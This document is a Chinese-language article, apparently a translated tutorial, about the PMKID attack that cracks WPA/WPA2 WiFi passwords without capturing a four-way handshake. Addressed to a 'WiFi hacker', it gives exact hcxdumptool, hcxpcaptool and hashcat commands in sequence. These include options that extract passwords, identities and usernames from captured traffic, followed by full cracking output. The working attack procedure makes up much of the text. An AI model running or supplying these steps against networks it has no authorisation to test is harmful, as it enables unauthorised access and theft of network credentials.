针对WiFi的新攻击方法黑客被发现破解WiFi密码,该密码通过WiFi网络中的WPA/WPA2保护,允许攻击者获得用于破解目标受害者使用的Wifi密码的预共享密钥哈希。Wi-Fi联盟发布的新WP3安全标准,为下一代Wi-Fi安全提供增强个人和企业网络的新功能,以及作为WPA2后续版本的新WP3安全标准。研究人员发现这次针对WiFi黑客的攻击在不执行EAPOL4次握手的情况下破坏了WPA/WPA2密码。据Steube谁是开发商Hashcat密码破解工具,新的攻击是在一个单一的EAPOL帧的RSNIE进行。
这篇文章中,我将介绍一种破解WPA PSK(预共享密钥)密码的新技术。
针对WiFi的新攻击方法黑客被发现破解WiFi密码,该密码通过WiFi网络中的WPA / WPA2保护,允许攻击者获得用于破解目标受害者使用的Wifi密码的预共享密钥哈希。
这一新的WiFi黑客方法是在针对最近发布的WPA3安全标准 的攻击中发现的,该标准自使用现代密钥建立协议的同步身份验证(SAE)以来极难破解。
Wi-Fi联盟发布的新WP3安全标准,为下一代Wi-Fi安全提供增强个人和企业网络的新功能,以及作为WPA2后续版本的新WP3安全标准 。
研究人员发现这次针对WiFi黑客的攻击在不执行EAPOL 4次握手的情况下破坏了WPA / WPA2密码。
据Steube 谁是开发商 Hashcat 密码破解工具,新的攻击是在一个单一的EAPOL帧的RSN IE(稳健安全网络信息元素)进行。
此外,这种攻击工作对所有类型的802.11i / p / q / r网络都启用了漫游功能,并且不清楚有多少供应商和这种技术可以使用多少路由器。
这个WPA / WPA2 WiFi黑客密码攻击如何适用于WiFi黑客
强大的安全网络信息单元(RSN IE)是802.11管理框架中的可选框架,它在单个EAPOL框架中工作。
每当用户尝试使用路由器进行身份验证时,可以从RSN IE捕获成对主密钥ID(PMKID)。
“在这里我们可以看到已经捕获的PMKID是通过使用HMAC-SHA1来计算的,其中密钥是PMK,数据部分是固定字符串标签”PMK Name“,接入点的MAC地址和站的MAC的串联。地址。”
为了利用这种新攻击,作为WiFi黑客,您需要以下工具:
- hcxdumptool v4.2.0或更高版本
- hcxtools v4.2.0或更高版本
- hashcat v4.2.0或更高版本
WiFi黑客 - 第1步
首先运行 hcxdumptool 以从AP获取PMKID,并使用以下代码将文件转储为PCAP格式。
$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 -enable_status
输出如下所示:
start capturing (stop with ctrl c)
INTERFACE:……………: wlp39s0f3u4u5
FILTERLIST……………: 0 entries
MAC CLIENT……………: 89acf0e761f4 (client)
MAC ACCESS POINT………: 4604ba734d4e (start NIC)
EAPOL TIMEOUT…………: 20000
DEAUTHENTICATIONINTERVALL: 10 beacons
GIVE UP DEAUTHENTICATIONS: 20 tries
REPLAYCOUNTER…………: 62083
ANONCE……………….: 9ddca61888470946305b27d413a28cf474f19ff64c71667e5c1aee144cd70a69
WiFi黑客 - 第2步
运行名为hcxpcaptool的下一个工具,使用以下代码将捕获的数据从pcapng格式转换为hashcat接受的哈希格式。
$ ./hcxpcaptool -z test.16800 test.pcapng
写入文件的内容将如下所示,并分为4列。
PMKID * MAC AP * MAC Station * ESSID
2582a8281bf9d4308d6f5731d0e61c61 * 4604ba734d4e * 89acf0e761f4 * ed487162465a774bfba60eb603a39f3a
此外,Researcher建议WiFi黑客使用,虽然不需要,但建议使用选项-E -I和-U与hcxpcaptool。我们可以使用这些文件来提供hashcat。它们通常会产生良好的效果
- -E从WiFi流量中检索可能的密码(此外,此列表将包含ESSID)
- - 我从WiFi流量中检索身份
- -U从WiFi流量中检索用户名
$ ./hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng
第3步
最后,运行hashcat来破解它,我们需要使用散列模式PMKID -16800,我们可以使用这个散列作为任何其他散列类型使用以下代码,
$ ./hashcat -m 16800 test.16800 -a 3 -w 3 ‘?l?l?l?l?l?lt!’
最后,它破解了散列 WPA-PMKID-PBKDF2
hashcat (v4.2.0) starting…
OpenCL Platform #1: NVIDIA Corporation======================================* Device #1: GeForce GTX 1080, 2028/8112 MB allocatable, 20MCU* Device #2: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU* Device #3: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU* Device #4: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCUHashes: 1 digests; 1 unique digests, 1 unique saltsBitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotatesApplicable optimizers:* Zero-Byte* Single-Hash* Single-Salt* Brute-Force* Slow-Hash-SIMD-LOOPMinimum password length supported by kernel: 8Maximum password length supported by kernel: 63Watchdog: Temperature abort trigger set to 90c2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a:hashcat!Session……….: hashcatStatus………..: CrackedHash.Type……..: WPA-PMKID-PBKDF2Hash.Target……: 2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf…a39f3aTime.Started…..: Thu Jul 26 12:51:38 2018 (41 secs)Time.Estimated…: Thu Jul 26 12:52:19 2018 (0 secs)Guess.Mask…….: ?l?l?l?l?l?lt! [8]Guess.Queue……: 1/1 (100.00%)Speed.Dev.#1…..: 408.9 kH/s (103.86ms) @ Accel:64 Loops:128 Thr:1024 Vec:1Speed.Dev.#2…..: 408.6 kH/s (104.90ms) @ Accel:64 Loops:128 Thr:1024 Vec:1Speed.Dev.#3…..: 412.9 kH/s (102.50ms) @ Accel:64 Loops:128 Thr:1024 Vec:1Speed.Dev.#4…..: 410.9 kH/s (104.66ms) @ Accel:64 Loops:128 Thr:1024 Vec:1Speed.Dev.#*…..: 1641.3 kH/sRecovered……..: 1/1 (100.00%) Digests, 1/1 (100.00%) SaltsProgress………: 66846720/308915776 (21.64%)Rejected………: 0/66846720 (0.00%)Restore.Point….: 0/11881376 (0.00%)Candidates.#1….: hariert! -> hhzkzet!Candidates.#2….: hdtivst! -> hzxkbnt!Candidates.#3….: gnxpwet! -> gwqivst!Candidates.#4….: gxhcddt! -> grjmrut!HWMon.Dev.#1…..: Temp: 81c Fan: 54% Util: 75% Core:1771MHz Mem:4513MHz Bus:1HWMon.Dev.#2…..: Temp: 81c Fan: 54% Util:100% Core:1607MHz Mem:4513MHz Bus:1HWMon.Dev.#3…..: Temp: 81c Fan: 54% Util: 94% Core:1683MHz Mem:4513MHz Bus:1HWMon.Dev.#4…..: Temp: 81c Fan: 54% Util: 93% Core:1620MHz Mem:4513MHz Bus:1Started: Thu Jul 26 12:51:30 2018Stopped: Thu Jul 26 12:52:21 2018当我们查看以前可用于WiFi黑客的WiFi黑客攻击时,我们需要坐下来等待目标用户稍后登录,我们可以通过捕获四次握手来破解密钥。
为了能够访问PMKID,这种新的攻击只需要尝试向无线网络进行身份验证,以后我们就可以轻松地破解WiFi密码和代表WiFi黑客的预共享密钥。
此外,这种方法更容易访问包含预共享密钥的哈希,以及稍后哈希将被破解的时刻,根据密码的复杂性,这种攻击也很复杂。
,
